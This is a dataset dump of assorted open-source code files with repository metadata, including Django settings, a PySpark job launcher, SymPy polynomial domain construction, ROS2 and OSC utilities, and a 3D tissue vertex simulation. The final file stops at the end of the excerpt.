content (string, 7-928k chars) | avg_line_length (float64, 3.5-33.8k) | max_line_length (int64, 6-139k) | alphanum_fraction (float64, 0.08-0.96) | licenses (sequence) | repository_name (string, 7-104 chars) | path (string, 4-230 chars) | size (int64, 7-928k) | lang (string, 1 class)
---|---|---|---|---|---|---|---|---
import os
import sys
import argparse
from importlib import import_module
from pyspark.sql import SparkSession
spark = SparkSession.builder.getOrCreate()
# Load configuration
parser = argparse.ArgumentParser()
parser.add_argument("job", type=str, nargs='?', default="Job1.MyMethod")
parser.add_argument("slot", type=str, nargs='?', default="2018/11/19")
args = parser.parse_args()
job_module, job_method = args.job.rsplit('.',1)
slot = args.slot
if "local" in spark.sparkContext.master:
dirname = os.path.dirname(__file__)
sys.path.insert(0, (os.path.join(dirname, 'Utils')))
sys.path.insert(0, (os.path.join(dirname, 'Jobs')))
spark.conf.set("ADLS",os.path.join(dirname, 'DataLake'))
else:
spark.sparkContext.addPyFile("dbfs:/MyApplication/Code/scripts.zip")
spark.conf.set("ADLS",'adl://myazuredatalake.azuredatalakestore.net/')
spark.conf.set("dfs.adls.oauth2.access.token.provider.type", "ClientCredential")
spark.conf.set("dfs.adls.oauth2.client.id", dbutils.secrets.get(scope = "SparkADLS - Secrets", key = "clientid"))
spark.conf.set("dfs.adls.oauth2.credential", dbutils.secrets.get(scope = "SparkADLS - Secrets", key = "credential"))
spark.conf.set("dfs.adls.oauth2.refresh.url", "https://login.microsoftonline.com/[tenantid]/oauth2/token")
# Execute Job
mod = import_module(job_module)
met = getattr(mod, job_method)
met(slot) | 38.388889 | 120 | 0.730825 | [
"MIT"
] | DataThirstLtd/databricks.pyspark.application.demo | main.py | 1,382 | Python |
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
SECRET_KEY = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
DEBUG = True
USE_TZ = False
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
]
MIDDLEWARE = [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
]
# ROOT_URLCONF = "tests.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
STATIC_URL = "/static/"
| 25.803922 | 70 | 0.648936 | [
"MIT"
] | QueraTeam/django-nextjs | tests/settings.py | 1,316 | Python |
import re
regexp = re.compile(r'''(
[a-zA-Z0-9._%+-]+ # username
@ # @ symbol
    (\w+)              # domain name
(\.[a-zA-Z]{2,4}) # dot-something
)''', re.VERBOSE)
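# Illustrative usage sketch (the address below is a made-up example):
#   regexp.search("contact me at [email protected]").group(1)
#   -> '[email protected]'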
| 17.2 | 37 | 0.482558 | [
"MIT"
] | 022ey/Python_Scripts | Email Adresses/email.py | 172 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by TaoYuan on 2018/2/28 0028.
# @Link : http://blog.csdn.net/lftaoyuan
# Github : https://github.com/seeways
import asyncio
import orm
from models import User, Blog, Comment
@asyncio.coroutine
def test(loop):
yield from orm.create_pool(loop=loop, user='root', password='123456', database='awesome')
# taoyuan 123456
u = User(name='TaoYuan', email='taoyuan', passwd='396d447288c288f0ff7ba1fc608600d7e233646d', image='about:blank')
yield from u.save()
loop = asyncio.get_event_loop()
loop.run_until_complete(test(loop))
loop.close()
| 27.954545 | 117 | 0.710569 | [
"Apache-2.0"
] | seeways/awesome-python3-webapp | www/test_sql.py | 615 | Python |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.dispatch import receiver
from gcloud.iam_auth.tasks import register_grant_resource_creator_task
from gcloud.core.signals import user_enter
@receiver(user_enter)
def user_enter_handler(username, **kwargs):
register_grant_resource_creator_task.delay(username=username)
| 46.272727 | 115 | 0.806483 | [
"Apache-2.0"
] | sighttviewliu/bk-sops | gcloud/iam_auth/signals/handlers.py | 1,036 | Python |
import _plotly_utils.basevalidators
class TextValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self, plotly_name="text", parent_name="heatmap.colorbar.title", **kwargs
):
super(TextValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class SideValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="side", parent_name="heatmap.colorbar.title", **kwargs
):
super(SideValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
role=kwargs.pop("role", "style"),
values=kwargs.pop("values", ["right", "top", "bottom"]),
**kwargs
)
import _plotly_utils.basevalidators
class FontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="font", parent_name="heatmap.colorbar.title", **kwargs
):
super(FontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Font"),
data_docs=kwargs.pop(
"data_docs",
"""
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
""",
),
**kwargs
)
| 34.863014 | 80 | 0.582711 | [
"MIT",
"BSD-3-Clause"
] | leex5089/leex5089.github.io | venv/Lib/site-packages/plotly/validators/heatmap/colorbar/title/__init__.py | 2,545 | Python |
from __future__ import unicode_literals
import sys
import types
from django import http
from django.core import signals
from django.utils.encoding import force_text
from django.utils.importlib import import_module
from django.utils.log import getLogger
from django.utils import six
logger = getLogger('django.request')
class BaseHandler(object):
# Changes that are always applied to a response (in this order).
response_fixes = [
http.fix_location_header,
http.conditional_content_removal,
http.fix_IE_for_attach,
http.fix_IE_for_vary,
]
def __init__(self):
self._request_middleware = self._view_middleware = self._template_response_middleware = self._response_middleware = self._exception_middleware = None
def load_middleware(self):
"""
Populate middleware lists from settings.MIDDLEWARE_CLASSES.
Must be called after the environment is fixed (see __call__ in subclasses).
"""
from django.conf import settings
from django.core import exceptions
self._view_middleware = []
self._template_response_middleware = []
self._response_middleware = []
self._exception_middleware = []
request_middleware = []
for middleware_path in settings.MIDDLEWARE_CLASSES:
try:
mw_module, mw_classname = middleware_path.rsplit('.', 1)
except ValueError:
raise exceptions.ImproperlyConfigured('%s isn\'t a middleware module' % middleware_path)
try:
mod = import_module(mw_module)
except ImportError as e:
raise exceptions.ImproperlyConfigured('Error importing middleware %s: "%s"' % (mw_module, e))
try:
mw_class = getattr(mod, mw_classname)
except AttributeError:
raise exceptions.ImproperlyConfigured('Middleware module "%s" does not define a "%s" class' % (mw_module, mw_classname))
try:
mw_instance = mw_class()
except exceptions.MiddlewareNotUsed:
continue
if hasattr(mw_instance, 'process_request'):
request_middleware.append(mw_instance.process_request)
if hasattr(mw_instance, 'process_view'):
self._view_middleware.append(mw_instance.process_view)
if hasattr(mw_instance, 'process_template_response'):
self._template_response_middleware.insert(0, mw_instance.process_template_response)
if hasattr(mw_instance, 'process_response'):
self._response_middleware.insert(0, mw_instance.process_response)
if hasattr(mw_instance, 'process_exception'):
self._exception_middleware.insert(0, mw_instance.process_exception)
# We only assign to this when initialization is complete as it is used
# as a flag for initialization being complete.
self._request_middleware = request_middleware
def get_response(self, request):
"Returns an HttpResponse object for the given HttpRequest"
from django.core import exceptions, urlresolvers
from django.conf import settings
try:
# Setup default url resolver for this thread, this code is outside
# the try/except so we don't get a spurious "unbound local
# variable" exception in the event an exception is raised before
# resolver is set
urlconf = settings.ROOT_URLCONF
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
try:
response = None
# Apply request middleware
for middleware_method in self._request_middleware:
response = middleware_method(request)
if response:
break
if response is None:
if hasattr(request, "urlconf"):
# Reset url resolver with a custom urlconf.
urlconf = request.urlconf
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
callback, callback_args, callback_kwargs = resolver.resolve(
request.path_info)
# Apply view middleware
for middleware_method in self._view_middleware:
response = middleware_method(request, callback, callback_args, callback_kwargs)
if response:
break
if response is None:
try:
response = callback(request, *callback_args, **callback_kwargs)
except Exception as e:
# If the view raised an exception, run it through exception
# middleware, and if the exception middleware returns a
# response, use that. Otherwise, reraise the exception.
for middleware_method in self._exception_middleware:
response = middleware_method(request, e)
if response:
break
if response is None:
raise
# Complain if the view returned None (a common error).
if response is None:
if isinstance(callback, types.FunctionType): # FBV
view_name = callback.__name__
else: # CBV
view_name = callback.__class__.__name__ + '.__call__'
raise ValueError("The view %s.%s didn't return an HttpResponse object." % (callback.__module__, view_name))
# If the response supports deferred rendering, apply template
# response middleware and the render the response
if hasattr(response, 'render') and callable(response.render):
for middleware_method in self._template_response_middleware:
response = middleware_method(request, response)
response = response.render()
except http.Http404 as e:
logger.warning('Not Found: %s', request.path,
extra={
'status_code': 404,
'request': request
})
if settings.DEBUG:
from django.views import debug
response = debug.technical_404_response(request, e)
else:
try:
callback, param_dict = resolver.resolve404()
response = callback(request, **param_dict)
except:
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
except exceptions.PermissionDenied:
logger.warning(
'Forbidden (Permission denied): %s', request.path,
extra={
'status_code': 403,
'request': request
})
try:
callback, param_dict = resolver.resolve403()
response = callback(request, **param_dict)
except:
signals.got_request_exception.send(
sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request,
resolver, sys.exc_info())
except SystemExit:
# Allow sys.exit() to actually exit. See tickets #1023 and #4701
raise
except: # Handle everything else, including SuspiciousOperation, etc.
# Get the exception info now, in case another exception is thrown later.
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
finally:
# Reset URLconf for this thread on the way out for complete
# isolation of request.urlconf
urlresolvers.set_urlconf(None)
try:
# Apply response middleware, regardless of the response
for middleware_method in self._response_middleware:
response = middleware_method(request, response)
response = self.apply_response_fixes(request, response)
except: # Any exception should be gathered and handled
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
return response
def handle_uncaught_exception(self, request, resolver, exc_info):
"""
Processing for any otherwise uncaught exceptions (those that will
generate HTTP 500 responses). Can be overridden by subclasses who want
customised 500 handling.
Be *very* careful when overriding this because the error could be
caused by anything, so assuming something like the database is always
available would be an error.
"""
from django.conf import settings
if settings.DEBUG_PROPAGATE_EXCEPTIONS:
raise
logger.error('Internal Server Error: %s', request.path,
exc_info=exc_info,
extra={
'status_code': 500,
'request': request
}
)
if settings.DEBUG:
from django.views import debug
return debug.technical_500_response(request, *exc_info)
# If Http500 handler is not installed, re-raise last exception
if resolver.urlconf_module is None:
six.reraise(*exc_info)
# Return an HttpResponse that displays a friendly error message.
callback, param_dict = resolver.resolve500()
return callback(request, **param_dict)
def apply_response_fixes(self, request, response):
"""
Applies each of the functions in self.response_fixes to the request and
response, modifying the response in the process. Returns the new
response.
"""
for func in self.response_fixes:
response = func(request, response)
return response
def get_script_name(environ):
"""
Returns the equivalent of the HTTP request's SCRIPT_NAME environment
variable. If Apache mod_rewrite has been used, returns what would have been
the script name prior to any rewriting (so it's the script name as seen
from the client's perspective), unless the FORCE_SCRIPT_NAME setting is
set (to anything).
"""
from django.conf import settings
if settings.FORCE_SCRIPT_NAME is not None:
return force_text(settings.FORCE_SCRIPT_NAME)
# If Apache's mod_rewrite had a whack at the URL, Apache set either
# SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any
# rewrites. Unfortunately not every Web server (lighttpd!) passes this
# information through all the time, so FORCE_SCRIPT_NAME, above, is still
# needed.
script_url = environ.get('SCRIPT_URL', '')
if not script_url:
script_url = environ.get('REDIRECT_URL', '')
if script_url:
return force_text(script_url[:-len(environ.get('PATH_INFO', ''))])
return force_text(environ.get('SCRIPT_NAME', ''))
| 45.076046 | 157 | 0.59806 | [
"BSD-3-Clause"
] | chalkchisel/django | django/core/handlers/base.py | 11,855 | Python |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Models package definition."""
from official.nlp.modeling.models.bert_classifier import BertClassifier
from official.nlp.modeling.models.bert_pretrainer import BertPretrainer
from official.nlp.modeling.models.bert_span_labeler import BertSpanLabeler
from official.nlp.modeling.models.bert_token_classifier import BertTokenClassifier
| 51.2 | 82 | 0.741211 | [
"Apache-2.0"
] | Aditya-shahh/models | official/nlp/modeling/models/__init__.py | 1,024 | Python |
"""Tools for constructing domains for expressions. """
from sympy.polys.polyutils import parallel_dict_from_basic
from sympy.polys.polyoptions import build_options
from sympy.polys.domains import ZZ, QQ, RR, EX
from sympy.assumptions import ask, Q
from sympy.core import S, sympify
from sympy.utilities import any
def _construct_simple(coeffs, opt):
"""Handle simple domains, e.g.: ZZ, QQ, RR and algebraic domains. """
result, rationals, reals, algebraics = {}, False, False, False
if opt.extension is True:
is_algebraic = lambda coeff: ask(Q.algebraic(coeff))
else:
is_algebraic = lambda coeff: False
# XXX: add support for a + b*I coefficients
for coeff in coeffs:
if coeff.is_Rational:
if not coeff.is_Integer:
rationals = True
elif coeff.is_Float:
if not algebraics:
reals = True
else:
# there are both reals and algebraics -> EX
return False
elif is_algebraic(coeff):
if not reals:
algebraics = True
else:
# there are both algebraics and reals -> EX
return False
else:
# this is a composite domain, e.g. ZZ[X], EX
return None
if algebraics:
domain, result = _construct_algebraic(coeffs, opt)
else:
if reals:
domain = RR
else:
if opt.field or rationals:
domain = QQ
else:
domain = ZZ
result = []
for coeff in coeffs:
result.append(domain.from_sympy(coeff))
return domain, result
def _construct_algebraic(coeffs, opt):
"""We know that coefficients are algebraic so construct the extension. """
from sympy.polys.numberfields import primitive_element
result, exts = [], set([])
for coeff in coeffs:
if coeff.is_Rational:
coeff = (None, 0, QQ.from_sympy(coeff))
else:
a = coeff.as_coeff_add()[0]
coeff -= a
b = coeff.as_coeff_mul()[0]
coeff /= b
exts.add(coeff)
a = QQ.from_sympy(a)
b = QQ.from_sympy(b)
coeff = (coeff, b, a)
result.append(coeff)
exts = list(exts)
g, span, H = primitive_element(exts, ex=True, polys=True)
root = sum([ s*ext for s, ext in zip(span, exts) ])
domain, g = QQ.algebraic_field((g, root)), g.rep.rep
for i, (coeff, a, b) in enumerate(result):
if coeff is not None:
coeff = a*domain.dtype.from_list(H[exts.index(coeff)], g, QQ) + b
else:
coeff = domain.dtype.from_list([b], g, QQ)
result[i] = coeff
return domain, result
def _construct_composite(coeffs, opt):
"""Handle composite domains, e.g.: ZZ[X], QQ[X], ZZ(X), QQ(X). """
numers, denoms = [], []
for coeff in coeffs:
numer, denom = coeff.as_numer_denom()
numers.append(numer)
denoms.append(denom)
polys, gens = parallel_dict_from_basic(numers + denoms) # XXX: sorting
if any(gen.is_number for gen in gens):
return None # generators are number-like so lets better use EX
n = len(gens)
k = len(polys)//2
numers = polys[:k]
denoms = polys[k:]
if opt.field:
fractions = True
else:
fractions, zeros = False, (0,)*n
for denom in denoms:
if len(denom) > 1 or zeros not in denom:
fractions = True
break
coeffs = set([])
if not fractions:
for numer, denom in zip(numers, denoms):
denom = denom[zeros]
for monom, coeff in numer.iteritems():
coeff /= denom
coeffs.add(coeff)
numer[monom] = coeff
else:
for numer, denom in zip(numers, denoms):
coeffs.update(numer.values())
coeffs.update(denom.values())
rationals, reals = False, False
for coeff in coeffs:
if coeff.is_Rational:
if not coeff.is_Integer:
rationals = True
elif coeff.is_Float:
reals = True
break
if reals:
ground = RR
elif rationals:
ground = QQ
else:
ground = ZZ
result = []
if not fractions:
domain = ground.poly_ring(*gens)
for numer in numers:
for monom, coeff in numer.iteritems():
numer[monom] = ground.from_sympy(coeff)
result.append(domain(numer))
else:
domain = ground.frac_field(*gens)
for numer, denom in zip(numers, denoms):
for monom, coeff in numer.iteritems():
numer[monom] = ground.from_sympy(coeff)
for monom, coeff in denom.iteritems():
denom[monom] = ground.from_sympy(coeff)
result.append(domain((numer, denom)))
return domain, result
def _construct_expression(coeffs, opt):
"""The last resort case, i.e. use the expression domain. """
domain, result = EX, []
for coeff in coeffs:
result.append(domain.from_sympy(coeff))
return domain, result
def construct_domain(obj, **args):
"""Construct a minimal domain for the list of coefficients. """
opt = build_options(args)
if hasattr(obj, '__iter__'):
if isinstance(obj, dict):
monoms, coeffs = zip(*obj.items())
else:
coeffs = obj
else:
coeffs = [obj]
coeffs = map(sympify, coeffs)
result = _construct_simple(coeffs, opt)
if result is not None:
if result is not False:
domain, coeffs = result
else:
domain, coeffs = _construct_expression(coeffs, opt)
else:
if opt.composite:
result = _construct_composite(coeffs, opt)
else:
result = None
if result is not None:
domain, coeffs = result
else:
domain, coeffs = _construct_expression(coeffs, opt)
if hasattr(obj, '__iter__'):
if isinstance(obj, dict):
return domain, dict(zip(monoms, coeffs))
else:
return domain, coeffs
else:
return domain, coeffs[0]
| 26.880342 | 78 | 0.563116 | [
"BSD-3-Clause"
] | jegerjensen/sympy | sympy/polys/constructor.py | 6,290 | Python |
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
| 15.428571 | 26 | 0.62963 | [
"BSD-3-Clause"
] | BlueMoon55/flask_test | tests/test_apps/helloworld/hello.py | 108 | Python |
import logging
import pathlib
from carim.configuration import decorators
from carim.global_resources import auth
from carim.util import file_writing
log = logging.getLogger(__name__)
@decorators.register
@decorators.server
def priority_queue(directory):
users = []
for priority_user in auth.get().get('priority', []):
users.append(priority_user['steam64'])
log.info('adding {} to priority queue'.format(priority_user['name']))
with file_writing.f_open(pathlib.Path(directory, 'priority.txt'), mode='w') as f:
f.writelines(user + ';' for user in users)
| 29.6 | 85 | 0.726351 | [
"Apache-2.0"
] | schana/dayz-server-carim | carim/configuration/universal/config.py | 592 | Python |
from pathlib import Path
from sys import stderr
from click import command, argument
from cv2 import cv2
from life_of_photo.game_of_life import GameOfLife
WINDOW_NAME = "Life of photo"
@command()
@argument("path")
def main(path):
path = Path(path).resolve()
if not path.exists():
print(f"`{path}` doesn't exist", file=stderr)
exit(1)
image = cv2.imread(str(path), cv2.IMREAD_GRAYSCALE)
cv2.namedWindow(WINDOW_NAME, cv2.WINDOW_KEEPRATIO)
cv2.imshow(WINDOW_NAME, image)
simulator = GameOfLife(image)
print("Press `q` to quit")
print("Press `s` to save the current world into an image")
for new_image in simulator:
match chr(cv2.waitKeyEx()):
case "q":
break
case "s":
filename = input("Enter filename: ")
file = path.parent / filename
cv2.imwrite(str(file), new_image)
cv2.imshow(WINDOW_NAME, new_image)
cv2.destroyAllWindows()
| 24.292683 | 62 | 0.629518 | [
"MIT"
] | DAtek/life-of-photo | life_of_photo/gui.py | 996 | Python |
from setuptools import setup
package_name = 'examples_rclpy_minimal_action_server'
setup(
name=package_name,
version='0.10.3',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
zip_safe=True,
author='Jacob Perron',
author_email='[email protected]',
maintainer='Shane Loretz',
maintainer_email='[email protected]',
keywords=['ROS'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Software Development',
],
description='Examples of action servers using rclpy.',
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'server = ' + package_name + '.server:main',
'server_defer = ' + package_name + '.server_defer:main',
'server_not_composable = ' + package_name + '.server_not_composable:main',
'server_queue_goals = ' + package_name + '.server_queue_goals:main',
'server_single_goal = ' + package_name + '.server_single_goal:main',
],
},
)
| 33.875 | 86 | 0.628044 | [
"Apache-2.0"
] | Ericsson/ros2-examples | rclpy/actions/minimal_action_server/setup.py | 1,355 | Python |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from x2paddle.optimizer.pass_ import Pass
from x2paddle.optimizer.fusion.dygraph import TraceFcFuser
from x2paddle.optimizer.pass_manager import pass_register
@pass_register
class TraceFcFusePass(Pass):
name = "trace_fc_fuse_pass"
def __init__(self):
Pass.__init__(self)
def apply(self, graph):
fuser = TraceFcFuser()
fuser.operate(graph, match_kind="topo")
# Used for registration
trace_fc_fuse_pass = TraceFcFusePass() | 32.030303 | 74 | 0.754967 | [
"Apache-2.0"
] | aiyasin/X2Paddle | x2paddle/optimizer/fusion/dygraph/trace_fc_fuse_pass.py | 1,065 | Python |
""" Plays back tiny performances by sending OSC messages to Pure Data """
import struct
import socket
import random
from threading import Timer
DEFAULT_OSC_ADDRESS = "localhost"
DEFAULT_OSC_PORT = 5000
class TouchScreenOscClient(object):
"""A simple OSC client for sending messages recording touch screen performances."""
def __init__(self):
# just set up the socket.
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.setblocking(0)
def send_osc_message(self, osc_datagram, address, port):
"""Send OSC message via UDP."""
self.sock.sendto(osc_datagram, (address, port))
def pad_dgram_four_bytes(self, dgram):
"""Pad a datagram up to a multiple of 4 bytes."""
return (dgram + (b'\x00' * (4 - len(dgram) % 4)))
def setSynth(self, instrument="strings", address=DEFAULT_OSC_ADDRESS, port=DEFAULT_OSC_PORT):
"""Sends an OSC message to set the synth instrument."""
dgram = b''
dgram += self.pad_dgram_four_bytes("/inst".encode('utf-8'))
dgram += self.pad_dgram_four_bytes(",s")
dgram += self.pad_dgram_four_bytes(instrument.encode('utf-8'))
self.send_osc_message(dgram, address, port)
def setSynthRandom(self):
"""Choose a random synth for performance playback"""
self.setSynth(random.choice(["chirp", "keys", "drums", "strings"]))
def sendTouch(self, x, y, z, address=DEFAULT_OSC_ADDRESS, port=DEFAULT_OSC_PORT):
"""Sends an OSC message to trigger a touch sound."""
dgram = b''
dgram += self.pad_dgram_four_bytes("/touch".encode('utf-8'))
        dgram += self.pad_dgram_four_bytes(",sfsfsf".encode('utf-8'))
dgram += self.pad_dgram_four_bytes("/x".encode('utf-8'))
dgram += struct.pack('>f', x)
dgram += self.pad_dgram_four_bytes("/y".encode('utf-8'))
dgram += struct.pack('>f', y)
dgram += self.pad_dgram_four_bytes("/z".encode('utf-8'))
dgram += struct.pack('>f', z)
self.send_osc_message(dgram, address, port)
def playPerformance(self, perf_df):
"""Schedule performance of a tiny performance dataframe."""
# Dataframe must have abolute time (in seconds) as index, and 'x', 'y', and 'z' as column names.
for row in perf_df.iterrows():
Timer(row[0], self.sendTouch, args=[row[1].x, row[1].y, row[1].z]).start() # used with time in column
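# Illustrative usage sketch (assumes a Pure Data patch is listening on the
# default address/port configured above):
#   client = TouchScreenOscClient()
#   client.setSynthRandom()
#   client.sendTouch(0.5, 0.5, 0.1)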
| 42.438596 | 114 | 0.647788 | [
"MIT"
] | cpmpercussion/robojam | robojam/tiny_performance_player.py | 2,419 | Python |
import networkx as nx
import numpy as np
import itertools
from scipy.spatial import distance
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import csv
import pdb
import globals as const
from funcs_orig import *
from math import isclose
from pyqt_viz import edge_viewer
import time
# Constants for simulation
dt = const.dt
#var_dt = True
# dimensions of the cell
l_apical = const.l_apical
l_depth = const.l_depth
# Set the arcs list
inner_arc = const.inner_arc
outer_arc = const.outer_arc
# mechanical parameters
# rest lengths of the passively elastic apical, basal and cell walls
l0_apical = l_apical
l0_basal = l_apical
l0_wall = l_depth
mu_apical = const.mu_apical
mu_basal = const.mu_basal
mu_wall = const.mu_wall
myo_beta = const.myo_beta
eta = const.eta
press_alpha = const.press_alpha
l_mvmt = const.l_mvmt
# initialize the tissue
G, K, centers, num_api_nodes, circum_sorted, belt, triangles = tissue_3d()
pit_centers = const.pit_centers
# Starting from t=0
t = 0
num_inter = 0
blacklist = []
contract = [True for counter in range(0,num_inter)]
#inter_edges = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]]
# Starting from t=? after intercalations occur
#t = 1640
#num_inter = 20
#blacklist = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]]
#contract = [False for counter in range(0,num_inter)]
#G = nx.read_gpickle('/home/cdurney/3d-vertex/concentric/t1640.pickle')
#
#for counter in range(0,num_inter):
# node = blacklist[counter][0]
# neighbor = blacklist[counter][1]
# print(node, neighbor)
# cents = list(set(K.neighbors(node)) & set(K.neighbors(neighbor)))
# ii = list((set(list(K.neighbors(node))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0]
# jj = list((set(list(K.neighbors(neighbor))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0]
# temp1 = list(set(K.neighbors(node)) & set(K.neighbors(cents[0])))
# temp1.remove(neighbor)
# temp2 = list(set(K.neighbors(neighbor)) & set(K.neighbors(cents[1])))
# temp2.remove(node)
# circum_sorted, triangles, K = new_topology(K,[node, neighbor], cents, temp1, temp2, ii, jj, belt, centers, num_api_nodes)
#
# t=initial nx Graph in pickled form for plotting later
print(t)
file_name = 't' + str(int(t))
nx.write_gpickle(G,file_name + '.pickle')
np.save(file_name,circum_sorted)
viewer = edge_viewer(G,attr='myosin')
t_plot=5
t_last=-t_plot
while t <= const.t_final:
if t == const.t_1:
for i in range(0,len(inner_arc)):
G[inner_arc[i-1]][inner_arc[i]]['myosin'] = const.belt_strength
print("Inner arc established")
# update myosin on outer arc
if t == const.t_2:
for i in range(0,len(outer_arc)):
G[outer_arc[i-1]][outer_arc[i]]['myosin'] = const.belt_strength
print("Outer arc established")
# update myosin on belt
if t == const.t_belt:
for i in range(0,len(belt)):
G[belt[i-1]][belt[i]]['myosin'] = const.belt_strength
print("Belt established")
if t-t_last>=t_plot:
viewer(G)
# increment t by dt
# initialize force_dict back to zeros
t = round(t+dt,1)
print(dt, t)
pos = nx.get_node_attributes(G,'pos')
force_dict = {new_list: np.zeros(3,dtype=float) for new_list in G.nodes()}
# pre-calculate magnitude of pressure
# index of list corresponds to index of centers list
PI = np.zeros(len(centers),dtype=float)
# eventually move to classes?
for n in range(0,len(centers)):
# get nodes for volume
pts = get_points(G,centers[n],pos)
# calculate volume
vol = convex_hull_volume_bis(pts)
# calculate pressure
PI[n] = -press_alpha*(vol-const.v_0)
# # Update myosin on a fictitious pit (no resemblance to SG geometry)
# if t < const.t_pit:
# myo = const.pit_strength*t
# for node in pit_centers:
# if node == 0:
# myo = 1.5*myo
# for neighbor in G.neighbors(node):
# G[node][neighbor]['myosin'] = myo
# if t > const.t_intercalate:
# if contract[0] == True:
# G[301][302]['myosin'] = const.belt_strength*(t-const.t_intercalate)
# update myosin on inner arc
for node in G.nodes():
# update force on each node
force = [0.0,0.0,0.0]
# Elastic forces due to the cytoskeleton
for neighbor in G.neighbors(node):
a = pos[node]
b = pos[neighbor]
dist = distance.euclidean(a,b)
direction = unit_vector(a,b)
magnitude = elastic_force(dist, G[node][neighbor]['l_rest'], mu_apical)
force = np.sum([force,magnitude*np.array(direction)],axis=0)
# Force due to myosin
magnitude = myo_beta*G[node][neighbor]['myosin']
force = np.sum([force, magnitude*np.array(direction)],axis=0)
force_dict[node] = np.add(force_dict[node], force)
for center in centers:
index = centers.index(center)
pts = circum_sorted[index]
centroid = np.array([pos[center], pos[center+1000]])
centroid = np.average(centroid,axis=0)
# pressure for:
# apical nodes
for i in range(0,len(circum_sorted[index])):
